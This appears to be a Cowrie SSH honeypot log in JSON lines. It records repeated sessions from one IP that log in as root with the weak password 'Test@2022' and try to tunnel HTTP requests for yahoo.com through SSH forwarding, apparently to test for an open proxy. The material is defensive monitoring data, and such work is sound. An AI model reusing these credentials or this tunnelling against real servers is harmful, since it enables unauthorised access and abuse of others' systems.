{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.207817Z","src_ip":"213.209.150.239","session":"e19bfeef823f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.266061Z","src_ip":"213.209.150.239","session":"e19bfeef823f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52643,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef815b7dd527","protocol":"ssh","message":"New connection: 213.209.150.239:52643 (1.2.3.4:22) [session: ef815b7dd527]","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.312377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.313478Z","src_ip":"213.209.150.239","session":"ef815b7dd527"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.360593Z","src_ip":"213.209.150.239","session":"ef815b7dd527"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.596138Z","src_ip":"213.209.150.239","session":"ef815b7dd527"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22940,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22940","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.644570Z","session":"ef815b7dd527"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.692095Z","src_ip":"213.209.150.239","session":"ef815b7dd527"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24734,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24734","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.829777Z","session":"ef815b7dd527"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.877568Z","src_ip":"213.209.150.239","session":"ef815b7dd527"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.925815Z","src_ip":"213.209.150.239","session":"ef815b7dd527"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52685,"dst_ip":"1.2.3.4","dst_port":22,"session":"3571ca2e883f","protocol":"ssh","message":"New connection: 213.209.150.239:52685 (1.2.3.4:22) [session: 3571ca2e883f]","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.972272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.973331Z","src_ip":"213.209.150.239","session":"3571ca2e883f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.020599Z","src_ip":"213.209.150.239","session":"3571ca2e883f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.255479Z","src_ip":"213.209.150.239","session":"3571ca2e883f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29619,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29619","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.303751Z","session":"3571ca2e883f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.351162Z","src_ip":"213.209.150.239","session":"3571ca2e883f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":30735,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30735","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.485614Z","session":"3571ca2e883f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.533285Z","src_ip":"213.209.150.239","session":"3571ca2e883f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.581453Z","src_ip":"213.209.150.239","session":"3571ca2e883f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52718,"dst_ip":"1.2.3.4","dst_port":22,"session":"e068bca482bc","protocol":"ssh","message":"New connection: 213.209.150.239:52718 (1.2.3.4:22) [session: e068bca482bc]","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.627521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.628220Z","src_ip":"213.209.150.239","session":"e068bca482bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.675333Z","src_ip":"213.209.150.239","session":"e068bca482bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:34.909504Z","src_ip":"213.209.150.239","session":"e068bca482bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17708,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17708","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.007466Z","session":"e068bca482bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.054851Z","src_ip":"213.209.150.239","session":"e068bca482bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7346,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7346","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.189517Z","session":"e068bca482bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.236813Z","src_ip":"213.209.150.239","session":"e068bca482bc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.284660Z","src_ip":"213.209.150.239","session":"e068bca482bc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52750,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ce19d62e9df","protocol":"ssh","message":"New connection: 213.209.150.239:52750 (1.2.3.4:22) [session: 1ce19d62e9df]","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.340449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.341558Z","src_ip":"213.209.150.239","session":"1ce19d62e9df"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.398139Z","src_ip":"213.209.150.239","session":"1ce19d62e9df"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.680365Z","src_ip":"213.209.150.239","session":"1ce19d62e9df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3706,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3706","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.738053Z","session":"1ce19d62e9df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.794909Z","src_ip":"213.209.150.239","session":"1ce19d62e9df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4541,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4541","sensor":"my-vps","timestamp":"2025-08-26T00:55:35.951095Z","session":"1ce19d62e9df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.007929Z","src_ip":"213.209.150.239","session":"1ce19d62e9df"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.065911Z","src_ip":"213.209.150.239","session":"1ce19d62e9df"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52795,"dst_ip":"1.2.3.4","dst_port":22,"session":"46b453b9c21a","protocol":"ssh","message":"New connection: 213.209.150.239:52795 (1.2.3.4:22) [session: 46b453b9c21a]","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.121332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.122052Z","src_ip":"213.209.150.239","session":"46b453b9c21a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.179389Z","src_ip":"213.209.150.239","session":"46b453b9c21a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.461762Z","src_ip":"213.209.150.239","session":"46b453b9c21a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":9397,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9397","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.519330Z","session":"46b453b9c21a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.576653Z","src_ip":"213.209.150.239","session":"46b453b9c21a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":3633,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3633","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.731041Z","session":"46b453b9c21a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.787716Z","src_ip":"213.209.150.239","session":"46b453b9c21a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.845438Z","src_ip":"213.209.150.239","session":"46b453b9c21a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52849,"dst_ip":"1.2.3.4","dst_port":22,"session":"3acfd869ccd3","protocol":"ssh","message":"New connection: 213.209.150.239:52849 (1.2.3.4:22) [session: 3acfd869ccd3]","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.891682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.892474Z","src_ip":"213.209.150.239","session":"3acfd869ccd3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","ke